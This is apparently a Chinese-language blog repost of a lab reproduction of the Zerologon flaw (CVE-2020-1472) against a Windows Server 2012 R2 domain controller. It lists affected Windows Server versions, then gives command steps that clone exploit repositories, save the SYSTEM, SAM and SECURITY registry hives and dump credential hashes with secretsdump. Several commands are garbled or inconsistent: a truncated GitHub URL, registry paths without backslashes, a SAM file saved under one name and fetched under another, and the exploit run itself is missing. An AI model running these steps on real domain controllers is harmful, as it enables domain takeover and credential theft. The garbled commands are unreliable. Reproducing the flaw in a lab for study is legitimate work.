漏洞描述
影响范围
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
复现环境
DC:
版本:windows server 2012R2
IP:192.168.111.133/24
Kali:
IP:192.168.111.128/24
Python:3.8.6
复现过程
git clone https://github.com/SecuraBV/CVE-2020-1472
cd CVE-2020-1472
git clone https://github.co/SecureAuthCorp/impacket
cd impacket
pip install
cd examples
git clone https://github.com/dirkjanm/CVE-2020-1472
reg save HKLMSYSTEM system.save
reg save HKLMSAM sam.exe
reg save HKLMSECURITY security.save
lget system.save
lget sam.save
lget security.save
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
git clone https://github.com/risksense/zerologon
注:文章仅参考学习,若有侵权联系删除
团队介绍
点击关注银河护卫队super
原文始发于微信公众号(银河护卫队super):CVE-2020-1472漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论